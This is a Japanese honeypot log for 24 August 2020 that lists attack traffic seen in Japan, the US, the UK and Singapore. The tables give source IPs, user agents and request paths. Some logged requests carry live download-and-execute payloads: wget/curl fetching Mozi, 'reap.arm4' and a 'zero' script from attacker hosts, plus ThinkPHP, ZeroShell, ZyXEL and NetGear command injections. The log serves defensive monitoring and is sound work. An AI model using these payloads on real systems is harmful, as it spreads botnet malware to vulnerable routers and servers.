ハニーポット(仮) 観測記録 2020/08/24分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZeroShell Linux Routerの脆弱性(CVE-2019-12725)を狙うアクセス
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
5[.]188[.]210[.]227に関する不正通信
を確認しました。
Location:US
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
ZyXELのNAS製品の脆弱性(CVE-2020-9054)を狙うアクセス
Nucleiによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
Location:UK
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nmap Scripting Engineによるスキャン行為
Nucleiによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget http[:]//192[.]168[.]1[.]1:8088/Mozi.a; chmod 777 Mozi.a; /tmp/Mozi.a jaws
Location:SG
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
Nucleiによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 164.90.154.158/reaper/reap.arm4; chmod 777 /tmp/reap.arm4; sh /tmp/reap.arm4
他
アクセス数推移
JP:総アクセス数:22 (前日比:-132)
US:総アクセス数:122 (前日比:+91)
UK:総アクセス数:100 (前日比:-16)
SG:総アクセス数:117 (前日比:+99)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 1.203.161.58 | China |
| 1 | 5.188.210.227 | Russia |
| 1 | 123.231.248.178 | Indonesia |
| 1 | 139.205.177.97 | China |
| 1 | 167.172.53.100 | United States |
| 1 | 185.39.11.105 | Switzerland |
| 2 | 185.150.189.165 | United States |
| 1 | 192.241.236.64 | United States |
| 1 | 192.241.237.238 | United States |
| 12 | 195.54.160.21 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | - |
| 1 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; KB974488) |
| 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 3 | Mozilla/5.0 zgrab/0.x |
| 1 | XTC BOTNET |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /Public/home/appjs/Index.js | HTTP/1.1 |
| 1 | GET | /ap/forgotpassword | HTTP/1.1 |
| 1 | GET | /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;cd%20%2Ftmp;curl%20-O%20http%3A%2F%2F5.206.227.228%2Fzero;sh%20zero;%22 | HTTP/1.0 |
| 2 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | GET | http[:]//5[.]188[.]210[.]227/echo.php | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 46.242.128.165 | Poland |
| 1 | 52.191.10.129 | United States |
| 37 | 80.82.70.178 | Netherlands |
| 2 | 88.218.17.243 | United Kingdom |
| 60 | 121.231.68.2 | China |
| 4 | 157.230.216.203 | United States |
| 3 | 185.39.11.105 | Switzerland |
| 5 | 185.150.189.165 | United States |
| 1 | 185.160.63.39 | Ukraine |
| 1 | 192.241.233.82 | United States |
| 1 | 192.241.239.175 | United States |
| 5 | 195.54.160.21 | Russia |
| 1 | 195.54.160.66 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 40 | - |
| 3 | Mozilla/0 (Project 25499 Scanner) |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) |
| 1 | Mozilla/5.0 |
| 60 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 4 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | Nuclei - Open-source project (github.com/projectdiscovery/nuclei) |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 | ||
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | /.git | HTTP/1.1 |
| 2 | GET | //MyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //PHPMYADMIN/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //SQLiteManager/main.php | HTTP/1.1 |
| 1 | GET | //database/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //db/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //dbadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //my/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //myadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //mysql/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //mysqladmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //pHpMyAdMiN/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin-2.10.0.0/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin-2.11.11.3-all-languages/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin-2.11.11.3/scripts/setup.ph | HTTP/1.1 |
| 1 | GET | //phpMyAdmin-2.11.11.3/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin-2.11.11/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin-2/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/db.init.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/db___.init.php | HTTP/1.1 |
| 1 | GET | //phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/db.init.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/db___.init.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin1/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //phpmyadmin2/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //scripts/setup.php | HTTP/1.1 |
| 1 | GET | //setup.php | HTTP/1.1 |
| 1 | GET | //sqladm/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //sqladmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | //sqlite/main.php | HTTP/1.1 |
| 1 | GET | //sqlitemanager/main.php | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /adminer-4.6.2.php | HTTP/1.1 |
| 1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
| 4 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /dev | HTTP/1.1 |
| 1 | GET | /etc/ | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /muieblackcat | HTTP/1.1 |
| 1 | GET | /panel | HTTP/1.1 |
| 60 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /requested.html | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 4 | POST | /boaform/admin/formLogin | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 46.242.128.165 | Poland |
| 1 | 49.87.126.76 | China |
| 3 | 64.227.84.136 | United States |
| 3 | 64.227.86.75 | United States |
| 4 | 71.6.146.185 | United States |
| 2 | 88.218.17.243 | United Kingdom |
| 1 | 118.250.154.185 | China |
| 2 | 139.162.4.14 | Netherlands |
| 4 | 157.230.216.203 | United States |
| 7 | 158.69.138.27 | Canada |
| 1 | 178.54.86.119 | Ukraine |
| 2 | 185.39.11.105 | Switzerland |
| 2 | 185.150.189.165 | United States |
| 1 | 192.241.239.203 | United States |
| 10 | 195.54.160.21 | Russia |
| 56 | 222.191.201.127 | China |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 10 | - |
| 2 | Go-http-client/1.1 |
| 2 | Hello, world |
| 3 | Mozilla/0 (Project 25499 Scanner) |
| 56 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 |
| 10 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 6 | Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html) |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | Nuclei - Open-source project (github.com/projectdiscovery/nuclei) |
| 1 | python-requests/2.23.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 2 | \x03 | ||
| 1 | CONNECT | ifconfig[.]me/:443 | HTTP/1.1 |
| 1 | CONNECT | ipv4bot[.]whatismyipaddress[.]com/:443 | HTTP/1.1 |
| 1 | CONNECT | md5calc[.]com/:443 | HTTP/1.1 |
| 1 | CONNECT | surfshark[.]com/:443 | HTTP/1.1 |
| 1 | CONNECT | wtfismyip[.]com/:443 | HTTP/1.1 |
| 1 | CONNECT | www[.]showmyip[.]com/:443 | HTTP/1.1 |
| 1 | GET | /.git | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 2 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 2 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 2 | GET | /HNAP1 | HTTP/1.1 |
| 1 | GET | /HNAP1/ | HTTP/1.1 |
| 2 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /dev | HTTP/1.1 |
| 1 | GET | /etc/ | HTTP/1.1 |
| 2 | GET | /favicon.ico | HTTP/1.1 |
| 2 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1598176813 | HTTP/1.1 |
| 1 | GET | /nmaplowercheck1598181877 | HTTP/1.1 |
| 1 | GET | /panel | HTTP/1.1 |
| 56 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /requested.html | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 2 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /ws | HTTP/1.1 |
| 1 | GET | http[:]//ipv4bot[.]whatismyipaddress[.]com/ | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
| 2 | POST | /sdk | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 46.242.128.165 | Poland |
| 1 | 52.231.12.76 | United States |
| 1 | 89.252.109.146 | Russia |
| 1 | 106.105.169.130 | Taiwan |
| 101 | 114.232.139.75 | China |
| 2 | 185.39.11.105 | Switzerland |
| 3 | 185.150.189.165 | United States |
| 1 | 192.241.235.74 | United States |
| 5 | 195.54.160.21 | Russia |
| 1 | 195.54.160.68 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | - |
| 1 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) |
| 1 | Mozilla/5.0 |
| 101 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 |
| 5 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 |
| 2 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0 |
| 3 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 1 | Nuclei - Open-source project (github.com/projectdiscovery/nuclei) |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /.env | HTTP/1.1 |
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /adminer-4.6.1.php | HTTP/1.1 |
| 3 | GET | /config/getuser?index=0 | HTTP/1.1 |
| 1 | GET | /etc/ | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 101 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
| 1 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 164.90.154.158/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4 | |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 2 | POST | /boaform/admin/formLogin | HTTP/1.1 |
